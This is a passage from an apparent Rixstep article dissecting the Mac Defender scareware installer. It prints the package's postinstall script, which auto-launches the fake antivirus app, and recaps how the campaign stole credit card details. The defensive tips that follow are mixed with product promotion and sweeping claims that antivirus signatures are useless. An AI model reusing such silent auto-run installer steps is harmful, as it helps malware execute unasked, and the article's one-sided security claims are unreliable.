Required NO
Relocatable NO
RequiresReboot NO
UseUserMask NO
OverwritePermissions NO
AllowBackRev NO
RootVolumeOnly NO
OnlyUpdateInstalledLanguages NO

postinstall, mcshdr.post_install

They're identical. And they're not taking any chances. They want to run the app as soon as it's in place. This is as good a reason as any to not let the user choose a different install location - so the script works.

#! /bin/sh

# need for auto start
open /Applications/mcshdr.app

And it's Apple's own Installer.app that runs it.

At which point you'll be toast.

To Recapitulate

As recounted elsewhere, the Mac Defender attack is a well thought out attack that may have taken months to get together. The first step was to compromise websites of eejits, hack their FTP accounts, and upload dynamited files to their servers.

Then followed the Google whacks which led to people clicking on links they'd provided at the sites they'd hijacked.

And then finally they uploaded Mac Defender so people would get hit by it. And the purpose of Mac Defender is to scare you into thinking you're infected so you pull out your credit card.

Then the hackers run away with your credit card info and buy mink coats and chinchilla coats or whatever they want.

But staying clear of Mac Defender is really easy and doesn't require any AV software.

  • Don't ever open anything you didn't want to download.
  • Turn off JavaScript when accessing any Google Images site.
  • Make sure you don't have Safari set to automatically open downloads.
  • Use something like Tracker to open and test run all new software. Yes it's our product. But no one else has one and frankly it's indispensable and frankly you need it.

So What Does This All Mean?

So what does this all mean?

There's nothing wrong with your computer. And there's nothing wrong with your operating system. The main attack vector isn't you anyway - it's the eejits who let their websites be compromised and it's Google who aren't blocking the bad sites fast enough.

The only attack vector locally on your own machine is your stupidity. And nothing helps against stupidity.

Virus signature lists SUCK. They're useless. They're 'after the fact'. They only worked in the 'old days' (very old days) long ago when virus writers were doing this for a lark and never followed up. But today things are deadly serious and there's a lot of dollars/rubles involved. Virus writers just check their iterations with the latest lists until they figure out a way to get through - all you get for your money is a false sense of security.

Virus signature lists SUCK. Just read that again.

See Also
ACP: Test Drive Xfile
ACP: Tracker: Why Chance It?
ACP: Xstrings: Of Needles and Haystacks

The Technological: Apple Customer Support
Rixstep Coldspots: Statement on the MacGuard Exploit
Rixstep Industry Watch: More on Mac Defender/MacGuard
The Technological: Playing 'Mac-A-Mole' with Apple Computers

About | ACP | Buy | Forum | Industry Watch | Learning Curve | Search | Twitter | Xnews
Copyright © Rixstep. All rights reserved.